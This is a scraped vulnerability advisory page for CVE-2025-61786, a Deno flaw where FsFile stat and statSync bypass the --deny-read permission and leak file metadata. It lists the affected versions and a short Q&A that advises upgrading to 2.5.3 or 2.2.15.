CVE-2025-61786
BaseFortify
Publication date: 2025-10-08
Last updated on: 2025-10-16
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| deno | deno | to 2.2.15 (inc) |
| deno | deno | From 2.3.0 (inc) to 2.5.3 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-269 | The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability in Deno versions prior to 2.5.3 and 2.2.15 allows bypassing the permission model that restricts reading files. Specifically, the methods Deno.FsFile.prototype.stat and statSync do not enforce the --deny-read=./ permission, enabling a script to retrieve file statistics for files it does not have explicit read access to. This happens even when the script is executed with read permissions denied, and the file is opened with write-only flags. The issue is fixed in versions 2.5.3 and 2.2.15.
How can this vulnerability impact me? :
This vulnerability can allow a user or script to obtain metadata about files they should not have access to, potentially exposing sensitive information such as file size, modification times, or existence of files. Although it does not allow reading the file contents, leaking file statistics can aid attackers in reconnaissance or bypassing security controls.
What immediate steps should I take to mitigate this vulnerability?
Upgrade Deno to version 2.5.3 or 2.2.15 or later, as these versions fix the issue where Deno.FsFile.prototype.stat and statSync bypass the permission model.